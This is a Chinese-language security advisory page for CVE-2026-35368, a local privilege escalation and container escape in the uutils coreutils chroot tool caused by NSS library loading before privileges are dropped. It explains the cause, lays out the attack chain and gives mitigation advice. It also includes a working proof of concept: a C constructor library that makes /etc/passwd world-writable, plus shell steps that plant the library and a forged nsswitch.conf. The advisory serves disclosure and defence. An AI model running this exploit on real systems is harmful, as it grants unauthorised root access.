IPBUF安全漏洞报告
English
CVE-2026-35368 CVSS 7.8 高危

CVE-2026-35368 uutils coreutils 权限提升漏洞

披露日期: 2026-04-22

漏洞信息

漏洞编号
CVE-2026-35368
漏洞类型
权限提升
CVSS评分
7.8 高危
攻击向量
本地 (AV:L)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
uutils coreutils

相关标签

权限提升容器逃逸uutilscoreutilsCVE-2026-35368代码注入

漏洞概述

uutils coreutils中的chroot工具存在安全漏洞。当使用--userspec选项时,程序在进入chroot环境后、丢弃root权限前调用getpwnam()解析用户,导致glibc从受控的新根目录加载NSS共享库。若新根目录可写,攻击者可注入恶意库以root身份执行代码,造成容器逃逸或本地权限提升。

技术细节

该漏洞源于程序执行顺序的不当设计。uutils coreutils的chroot工具在使用--userspec参数时,首先执行chroot()系统调用将根目录切换至用户指定路径(NEWROOT),随后调用getpwnam()来解析用户和组ID。在基于glibc的系统中,getpwnam()依赖名称服务交换(NSS)机制,该机制会根据配置动态加载共享库(如libnss_files.so.2等)。由于此时程序尚未调用setuid/setgid丢弃root权限,且当前根目录已切换至NEWROOT,如果攻击者对NEWROOT拥有写权限,便可在其中放置恶意的.so文件及伪造的nsswitch.conf。当getpwnam()尝试解析用户信息时,会加载攻击者提供的恶意库,并以root权限运行其中的初始化代码,从而允许攻击者执行任意命令或逃逸容器环境。

攻击链分析

STEP 1
步骤1:环境准备
攻击者获得对系统或容器的访问权限,并拥有对某个目录(将被用作chroot的NEWROOT)的写权限。
STEP 2
步骤2:恶意文件植入
攻击者在NEWROOT中创建特定的目录结构(如/lib和/etc),并编译部署恶意的NSS共享库及修改后的nsswitch.conf配置文件。
STEP 3
步骤3:触发漏洞
攻击者执行存在漏洞的uutils chroot命令,指定受控目录为NEWROOT,并使用--userspec参数触发用户解析逻辑。
STEP 4
步骤4:库加载与执行
程序进入chroot环境并以root权限调用getpwnam(),glibc从NEWROOT加载攻击者的恶意库并执行初始化代码。
STEP 5
步骤5:获取权限
恶意代码以root身份执行,攻击者成功获取系统最高权限或实现容器逃逸。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
// malicious_nss.c - Compile with: gcc -shared -fPIC -o libnss_exploit.so.2 malicious_nss.c #include <stdlib.h> // Constructor attribute to run code upon library loading __attribute__((constructor)) void init() { // Malicious actions to be executed as root system("chmod 777 /etc/passwd"); system("id > /tmp/poc_success.txt"); } /* * Exploit Setup (Bash): * 1. mkdir -p /tmp/fake_root/lib /tmp/fake_root/etc * 2. cp libnss_exploit.so.2 /tmp/fake_root/lib/ * 3. echo "passwd: files exploit" > /tmp/fake_root/etc/nsswitch.conf * 4. /path/to/uutils/chroot --userspec=root:root /tmp/fake_root /bin/sh */

影响范围

uutils coreutils (Issue #10327相关版本)

防御指南

临时缓解措施
建议立即更新uutils coreutils以修复此漏洞。若无法立即更新,应严格限制系统中chroot目标目录(NEWROOT)的写入权限,确保普通用户无法在其中创建或篡改NSS库文件及配置文件,从而防止恶意模块被加载。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表